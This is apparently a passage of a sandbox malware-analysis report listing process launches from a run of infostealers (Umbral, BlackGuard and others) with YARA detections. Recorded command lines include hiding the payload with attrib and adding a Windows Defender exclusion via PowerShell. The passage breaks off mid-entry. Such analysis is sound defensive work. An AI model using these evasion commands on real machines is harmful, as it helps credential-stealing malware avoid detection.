                                      Has exited:true

                                      Target ID:8
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:9
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:10
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0x560000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:11
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Insidious.exe"
                                      Imagebase:0x24510880000
                                      File size:281'088 bytes
                                      MD5 hash:B70C03532081C928F946E844C5D2172D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_44CaliberStealer, Description: Yara detected 44Caliber Stealer, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_44CaliberStealer, Description: Yara detected 44Caliber Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:12
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0x300000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:13
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0x1e0000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:19:47:02
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x1dcb4050000
                                      File size:236'544 bytes
                                      MD5 hash:DF69E1468A4656F2EEC526DE59A89A8B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 92%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:15
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:16
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:17
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:18
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff61de30000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:19
                                      Start time:19:47:03
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\timeout.exe
                                      Wow64 process (32bit):false
                                      Commandline:timeout 4 /nobreak
                                      Imagebase:0x7ff622290000
                                      File size:32'768 bytes
                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:20
                                      Start time:19:47:04
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:21
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic.exe" csproduct get uuid
                                      Imagebase:0x7ff7daad0000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:23
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Insidious.exe"
                                      Imagebase:0x2acce430000
                                      File size:281'088 bytes
                                      MD5 hash:B70C03532081C928F946E844C5D2172D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:24
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0xe0000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0xb30000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x22382010000
                                      File size:236'544 bytes
                                      MD5 hash:DF69E1468A4656F2EEC526DE59A89A8B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:19:47:05
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0xfe0000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff61de30000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:19:47:06
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\timeout.exe
                                      Wow64 process (32bit):false
                                      Commandline:timeout 4 /nobreak
                                      Imagebase:0x7ff622290000
                                      File size:32'768 bytes
                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:19:47:07
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\mode.com
                                      Wow64 process (32bit):false
                                      Commandline:mode con: cols=103 lines=21
                                      Imagebase:0x7ff686c50000
                                      File size:33'280 bytes
                                      MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:19:47:07
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:37
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:38
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Insidious.exe"
                                      Imagebase:0x1cfac150000
                                      File size:281'088 bytes
                                      MD5 hash:B70C03532081C928F946E844C5D2172D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 00000026.00000002.2168782168.000001CFADD75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:39
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0xc10000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\attrib.exe
                                      Wow64 process (32bit):false
                                      Commandline:"attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x7ff7aa790000
                                      File size:23'040 bytes
                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                      Imagebase:0x2e687550000
                                      File size:236'544 bytes
                                      MD5 hash:DF69E1468A4656F2EEC526DE59A89A8B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0x840000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:19:47:08
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0xb00000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:19:47:09
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff61de30000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:19:47:09
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\timeout.exe
                                      Wow64 process (32bit):false
                                      Commandline:timeout 4 /nobreak
                                      Imagebase:0x7ff622290000
                                      File size:32'768 bytes
                                      MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:19:47:10
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\mode.com
                                      Wow64 process (32bit):false
                                      Commandline:mode con: cols=103 lines=21
                                      Imagebase:0x7ff686c50000
                                      File size:33'280 bytes
                                      MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:19:47:11
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                                      Imagebase:0x7ff70f750000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:55
                                      Start time:19:47:11
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:56
                                      Start time:19:47:11
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Insidious.exe"
                                      Imagebase:0x220c76f0000
                                      File size:281'088 bytes
                                      MD5 hash:B70C03532081C928F946E844C5D2172D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: 00000038.00000002.2206155033.00000220C9505000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:true

                                      Target ID:57
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                                      Imagebase:0x630000
                                      File size:212'480 bytes
                                      MD5 hash:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                                      Imagebase:0x8f0000
                                      File size:606'720 bytes
                                      MD5 hash:0BA8218F991E81620F31083273EE7D91
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Nursultan.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                                      Imagebase:0x470000
                                      File size:805'888 bytes
                                      MD5 hash:A99954BFF017983BF455DE31C5F0696A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:60
                                      Start time:19:47:12
                                      Start date:06/09/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
